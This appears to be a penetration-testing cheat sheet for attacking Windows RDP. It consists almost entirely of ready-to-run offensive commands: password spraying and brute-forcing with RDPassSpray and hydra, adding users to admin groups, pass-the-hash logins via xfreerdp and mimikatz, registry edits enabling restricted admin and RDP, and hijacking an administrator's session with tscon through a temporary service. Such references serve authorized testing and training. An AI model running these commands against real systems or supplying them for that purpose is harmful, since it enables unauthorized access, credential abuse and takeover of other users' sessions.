RDP

Port : 3389

Enumeration

#Bruteforce
#https://github.com/xFreed0m/RDPassSpray [Note: If <spaces> within the passwords, tool will fail]
python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

hydra -V -f -L ./users.txt -P ./passwords.txt rdp -M targets.txt -t 1 -W 3 -c 5

Connect with known credentials/hash

#net localgroup administrators userx /add
#net localgroup "Remote Management Users" userx /add

rdesktop -g 1600x800 -r disk:tmp=/usr/share/windows-binaries 192.168.30.30 -u pelota -p  -g 95%
xfreerdp /u:admin /p:password /cert:ignore /v:10.10.138.3 /workarea /drive:/localdir,share /dynamic-resolution +clipboard

#In case of error : (ERRCONNECT_CONNECT_TRANSPORT_FAILED)| Add this flag
/sec:tls 

#Connect via hash works if restricted admin is enabled. 
xfreerdp /u:<user> /d:<domain> /pth:<hash> /v:<IP>
sekurlsa::pth /user:<user> /domain<domain> /ntlm:<hash> /run:"mstsc.exe /restrictedadmin"

#Enabled restricted admin
"HKLM:\System\Current\ControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
  • /drive:LOCAL_DIRECTORY,SHARE_NAME -- creates a shared drive between the attacking machine and the target. This switch is insanely useful as it allows us to very easily use our toolkit on the remote target, and save any outputs back directly to our own hard drive. In essence, this means that we never actually have to create any files on the target. For example, to share the current directory in a share called share, you could use: /drive:.,share, with the period (.) referring to the current directory.

When creating a shared drive, this can be accessed either from the command line as \\tsclient\, or through File Explorer under "This PC":

#Bypass prompt for credentials before you establish a remote desktop connection
https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remote-desktop-connection-6-prompts-credentials

Enable RDP

#Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

#Alternative
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

#Disable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f; Disable-NetFirewallRule -DisplayGroup "Remote Desktop"

RDP Hijack

  • Reference Youtube Link

Exploitation

  • List RDP logged in users: query user

sc create a binpath="cmd.exe /k tscon <Insert admin's ID No:> /dest:<Your Session Name>"  
#Hijack admin's session
net start a
sc.exe delete a

Last updated